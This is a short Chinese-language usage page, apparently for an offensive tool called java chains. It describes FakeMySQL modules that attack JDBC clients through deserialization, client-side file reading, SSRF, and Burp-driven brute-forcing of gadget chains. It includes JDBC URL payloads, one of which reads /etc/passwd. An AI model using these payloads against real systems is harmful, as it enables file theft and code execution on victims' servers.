MySQL JDBC 利用
FakeMySQLPayload
MySQL JDBC 反序列化利用姿势
FakeMySQL 模块和 JNDI 模块 的利用方式非常相似。
JNDI 通过 LDAP/RMI 参数传递 token,与后端进行匹配并返回相应的 Payload。
相比之下,FakeMySQL 则通过 MySQL JDBC 用户名传递 token 参数。
这个模块也与 JNDI 模块一样采用了相同兼容逻辑:如果 token 没有匹配到,它将默认返回最新生成的 Payload。
FakeMySQLReadPayload
MySQL JDBC 客户端文件读取、SSRF 姿势
这里支持两个传参方式,第一种是在 java chains 输入参数,然后返回一个 token,把该放入 jdbc payload 中
jdbc:mysql://127.0.0.1:3308/test?user=[TOKEN]
第二种传参方式是在 username 中设置参数,格式为:fileread_[file name]
其中 fileread_ 是固定前缀,后缀跟要读取的文件名,例如下面 JDBC 读取文件 Payload
jdbc:mysql://127.0.0.1:3308/test?user=fileread_/etc/passwd
FakeMySQLSHPayload
FakeMySQL 反序列化爆破链,一键测试常规反序列化链,提高测试效率
可放入到 Burp 中进行批量爆破测试
总体使用流程等同于 JNDI 的爆破链,可进行参考: JNDIShowHandPayload